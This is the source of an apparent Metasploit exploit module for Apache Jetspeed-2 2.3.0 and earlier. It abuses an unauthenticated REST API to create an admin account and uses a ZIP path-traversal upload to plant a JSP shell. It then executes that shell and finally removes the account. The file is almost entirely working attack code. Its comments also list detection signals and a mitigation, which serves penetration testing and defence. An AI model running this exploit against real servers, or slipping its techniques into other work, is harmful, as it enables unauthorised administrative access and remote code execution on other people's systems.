Path: blob/master/modules/exploits/multi/http/apache_jetspeed_file_upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for Apache Jetspeed-2 <= 2.3.0. It first abuses the
# unsecured User Manager REST API to create an admin account, then uses the
# admin-only Import/Export upload with a ZIP whose member name walks up the
# directory tree to drop a JSP into webapps/jetspeed, and finally requests
# that JSP to run the payload.
#
# Every phase leaves server-side artifacts a defender can look for: a new
# user and role grant via /jetspeed/services/usermanager/users, a form login
# for that user, a multipart POST carrying a ZIP with a '../' member name,
# an extraction directory under temp/, and a GET for a random *.jsp under
# /jetspeed/. The per-method comments below spell out each request.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata and options. No `check` method is implemented; the
  # description explains why (the upload clobbered the web interface in
  # testing), which is also why the rank is Manual.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Jetspeed Arbitrary File Upload',
      'Description'    => %q{
        This module exploits the unsecured User Manager REST API and a ZIP file
        path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier
        versions, to upload and execute a shell.

        Note: this exploit will create, use, and then delete a new admin user.

        Warning: in testing, exploiting the file upload clobbered the web
        interface beyond repair. No workaround has been found yet. Use this
        module at your own risk. No check will be implemented.
      },
      'Author'         => [
        'Andreas Lindh', # Vulnerability discovery
        'wvu'            # Metasploit module
      ],
      'References'     => [
        ['CVE', '2016-0710'],
        ['CVE', '2016-0709'],
        ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],
        ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']
      ],
      'DisclosureDate' => '2016-03-06',
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux', 'win'],
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      # The target only selects the path separator style used when
      # registering files for cleanup (see upload_payload_zip).
      'Targets'        => [
        ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'],
        ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      Opt::RPORT(8080)
    ])
  end

  # Prefix every status line with the host:port being worked on.
  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  # Same host:port prefix for warnings.
  def print_warning(msg='')
    super("#{peer} - #{msg}")
  end

  # Entry point. Four network-visible phases, strictly in this order:
  # user creation, form login, multipart ZIP upload, GET of the dropped
  # JSP. Only the last phase involves the payload; the first three are
  # plain HTTP and appear in the server access log as a tight sequence of
  # requests against the URIs used in the methods below.
  def exploit
    print_status("Creating admin user: #{username}:#{password}")
    create_admin_user
    print_status('Logging in as newly created admin')
    jetspeed_login
    print_status("Uploading payload ZIP: #{zip_filename}")
    upload_payload_zip
    print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
    exec_jsp_shell
  end

  # Runs after the session is established: remove the temporary user over
  # the REST API, then hand off to FileDropper (via super) to delete the
  # paths registered in upload_payload_zip.
  def cleanup
    print_status("Deleting user: #{username}")
    delete_user
    super
  end

  #
  # Exploit methods
  #

  # Two POSTs to the User Manager REST API, neither carrying a cookie or
  # any other credential: the first creates the user, the second enables
  # it and assigns the 'admin' role. The whole technique rests on this
  # endpoint accepting unauthenticated writes; an unexpected user creation
  # followed immediately by a role change on this URI is the earliest
  # detectable signal of the module.
  def create_admin_user
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/jetspeed/services/usermanager/users',
      'vars_post' => {
        'name' => username,
        'password' => password,
        'password_confirm' => password
      }
    )
    send_request_cgi(
      'method' => 'POST',
      'uri' => "/jetspeed/services/usermanager/users/#{username}",
      'vars_post' => {
        'user_enabled' => 'true',
        'roles' => 'admin'
      }
    )
  end

  # Container-style form login. The GET to the login redirector is only
  # needed for the session cookie it sets; that cookie is then presented to
  # j_security_check together with the new credentials. The bang variant of
  # send_request_cgi is used for the POST — presumably so that the
  # post-login redirect is followed before cookies are read; TODO confirm
  # against HttpClient. The resulting cookies are kept in @cookie and sent
  # with every later request.
  def jetspeed_login
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/jetspeed/login/redirector'
    )

    res = send_request_cgi!(
      'method' => 'POST',
      'uri' => '/jetspeed/login/j_security_check',
      'cookie' => res.get_cookies,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password
      }
    )

    @cookie = res.get_cookies
  end

  # Let's pretend we're mechanize
  #
  # Returns the action URL of the "Import File" form. It scrapes two admin
  # pages with the session cookie: the Administrative site.psml page for the
  # Import/Export link, then that page for the form itself. Each call makes
  # both requests; upload_payload_zip calls it once.
  def import_file
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/jetspeed/portal/Administrative/site.psml',
      'cookie' => @cookie
    )

    html = res.get_html_document
    import_export = html.at('//a[*//text() = "Import/Export"]/@href')

    res = send_request_cgi!(
      'method' => 'POST',
      'uri' => import_export,
      'cookie' => @cookie
    )

    html = res.get_html_document
    html.at('//form[*//text() = "Import File"]/@action')
  end

  # Builds and submits the upload. The ZIP has a single member whose name
  # starts with "../../", so a server-side extractor that trusts member
  # names writes the payload outside its own directory, into
  # webapps/jetspeed/. Mitigation side: an extractor that normalises each
  # member name and rejects any that resolves outside the destination
  # directory closes this vector. The multipart fields (fileInput,
  # copyIdsOnImport, uploadFile) mirror the Import File form.
  #
  # NOTE(review): the cleanup paths use a single ".." (and a backslash
  # variant on Windows) while the archive member uses "../../", and a
  # temp/<username> directory is registered as well — presumably the JSP
  # payload runs from a different working directory than the extractor and
  # the archive is unpacked under temp/<username>; confirm before relying
  # on cleanup to remove the artifacts.
  def upload_payload_zip
    zip = Rex::Zip::Archive.new
    zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)

    mime = Rex::MIME::Message.new
    mime.add_part(zip.pack, 'application/zip', 'binary',
                  %Q{form-data; name="fileInput"; filename="#{zip_filename}"})
    mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')
    mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')

    case target['Platform']
    when 'linux'
      register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
      register_dir_for_cleanup("../temp/#{username}")
    when 'win'
      register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
      register_dir_for_cleanup("..\\temp\\#{username}")
    end

    send_request_cgi(
      'method' => 'POST',
      'uri' => import_file,
      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
      'cookie' => @cookie,
      'data' => mime.to_s
    )
  end

  # Requests the dropped JSP with the admin session cookie; serving it is
  # what runs the payload. A GET for a random eight-letter *.jsp directly
  # under /jetspeed/ is the final log-visible step.
  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri' => "/jetspeed/#{jsp_filename}",
      'cookie' => @cookie
    )
  end

  #
  # Cleanup methods
  #

  # DELETE against the same User Manager endpoint used to create the
  # account. As with creation, no cookie is sent.
  def delete_user
    send_request_cgi(
      'method' => 'DELETE',
      'uri' => "/jetspeed/services/usermanager/users/#{username}"
    )
  end

  #
  # Utility methods
  #

  # Per-run random identifiers, memoised with ||= so that every method in
  # the run sees the same value (cleanup must delete the user and files
  # that exploit created).
  def username
    @username ||= Rex::Text.rand_text_alpha_lower(8)
  end

  def password
    @password ||= Rex::Text.rand_text_alphanumeric(8)
  end

  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end

  def zip_filename
    @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
  end
end